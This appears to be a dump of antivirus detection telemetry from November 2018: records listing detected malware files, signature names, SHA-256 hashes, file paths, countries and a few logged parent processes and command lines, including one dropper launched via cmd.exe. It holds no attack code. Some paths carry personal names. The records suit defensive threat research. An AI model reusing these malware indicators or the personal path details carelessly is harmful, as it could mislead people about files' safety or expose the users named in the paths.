  Row(detection=Row(filename='avscan-20181102-061303-53bd5b1d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061303-53BD5B1D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061858-2762ec2d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061858-2762EC2D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050429-bf98c159', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050429-BF98C159', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052635-d6390b85', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052635-D6390B85', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050457-d0767103', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050457-D0767103', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050416-b79f2f98', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050416-B79F2F98', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054032-c8c4bf2a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054032-C8C4BF2A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055200-6323bcdf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055200-6323BCDF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051815-ac357761', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051815-AC357761', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054626-9bdc1c75', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054626-9BDC1C75', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061829-1618989f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061829-1618989F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055802-3a9c8036', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055802-3A9C8036', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055329-97e5c429', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055329-97E5C429', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054038-cc39bc59', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054038-CC39BC59', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051321-fcdf2c59', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051321-FCDF2C59', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062106-7390365c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062106-7390365C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060751-99d34780', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060751-99D34780', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055405-ad73624f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055405-AD73624F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vncviewer.exe', filepath='C:\\Users\\X\\Desktop\\MIGUEL ANGEL\\Users\\Megainfo1\\Desktop\\MEGARED GML\\Archivos de programa\\UltraVNC\\vncviewer.exe', filesize=1024000, name='TR/Vundo.Gen7.#M300.#R600162'), hash='890a0dd467657d5ffa711c3bfabdb963d2f8398fca02af7d3a00186f2aab31f5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe4_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe4 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=280576, timestamp='2018-11-02T11:10:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061531-ac21fe64', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061531-AC21FE64', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053319-c6b44a7e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053319-C6B44A7E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055524-dca2c22c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055524-DCA2C22C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054407-48f24d9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054407-48F24D9A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055711-1c041658', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055711-1C041658', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T18:45:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054131-ec0279fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054131-EC0279FC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051208-d1211717', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051208-D1211717', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061526-a9246baf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061526-A9246BAF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054500-68db95ea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054500-68DB95EA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054950-153dfb96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054950-153DFB96', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T00:15:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054948-1467795b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054948-1467795B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053537-190efd4a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053537-190EFD4A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060212-cfbf8996', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060212-CFBF8996', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053725-59461690', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053725-59461690', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060525-42ffcc29', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060525-42FFCC29', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052029-fbe94c28', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052029-FBE94C28', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060948-df74f5d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060948-DF74F5D9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060105-a7796ad3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060105-A7796AD3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='play.exe', filepath='i:\\العاب\\فورملا وان\\Play.exe', filesize=832000, name='HEUR/AGEN.1015942.#M1.#R1'), hash='417b87e141c6487ea2e542ad73502badb00ecc6669baafb43db69560a3436524', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:48:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~pp9242.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~pp9242.tmp', filesize=128000, name='HEUR/AGEN.1030705.#M1.#R1'), hash='3dfb3bcd7618c2bc34a4b30c7062e1d0204afe188d4c326613667d5c1ce30a25', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:15:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-143257-7a96806e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-142842-4F9964B3\\AVSCAN-20181101-143257-7A96806E', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:32:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='3d144e0c-954b-550f-d461-2906de8fb2bb.exe', filepath='M:\\{1a9084ac-c6a1-8653-1449-f7f80a202819}\\3d144e0c-954b-550f-d461-2906de8fb2bb.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='535d6a370c11ea8999e478968994022ae16c60fb69f0fa5e76b4a6a9403f1c8f', metadata=Row(cmdline='\\\\\\/c \\\\\\"{1a9084ac-c6a1-8653-1449-f7f80a202819}\\\\\\\\3d144e0c-954b-550f-d461-2906de8fb2bb.exe \'DCIM\\\\\\\\\'\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\cmd.exe', parentsize=302592, timestamp='2018-11-01T14:01:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='videoconvert.30b82573c10d4fd08477f17390677259[1].exe', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\077Z9PO7\\VideoConvert.30b82573c10d4fd08477f17390677259[1].exe', filesize=380000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='2ef9d244711647f816f2f0600bfeb1247fad7214ccc12e1851e40d42e7d3b3b0', metadata=Row(cmdline='SCODEF:7616 CREDAT:275457 \\\\\\/prefetch:2', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=817456, timestamp='2018-11-01T10:39:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='- lain.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LAIN - LAIN\\- LAIN.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-143302-ef5e8753', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_00648505\\AVSCAN-20181101-142722-D9B1446B\\AVSCAN-20181101-143302-EF5E8753', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='0d2d6a22909d41cd4a4a05ccdedeb4240bc9464b1d44c0cec86029ac3cec1502', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:26:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cap.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\RPG\\CAP\\CAP.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1_nfe.exe', filepath='C:\\Restaurador PDV\\install nfe\\1_NFe.exe', filesize=128000, name='W32/Sality.AG.#M1.#R1'), hash='41922bf2500a97b2e4d136672b2ce61ab5a6193552e93b550f5805564af5ec61', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jusched.exe', parentsize=224128, timestamp='2018-11-01T19:57:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='enviar malote feit o em 11 06 .scr', filepath='C:\\Users\\X\\Desktop\\enviar malote feit o em 11 06 .scr', filesize=320000, name='WORM/Nenebra.A.#M1.#R1'), hash='53a514f013d76540f5daf64de34a640b8a214a9af019a5c257fd562ca7d50ee5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe2_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:41:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-170710-90db7ba7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-170558-84D52381\\AVSCAN-20181101-170710-90DB7BA7', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:07:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='protection for autorun.exe', filepath='E:\\autorun.inf\\Protection for Autorun.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:47:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2016.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2016\\2016.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:26:57Z'), dt=datetime.date(2018, 11, 1)),
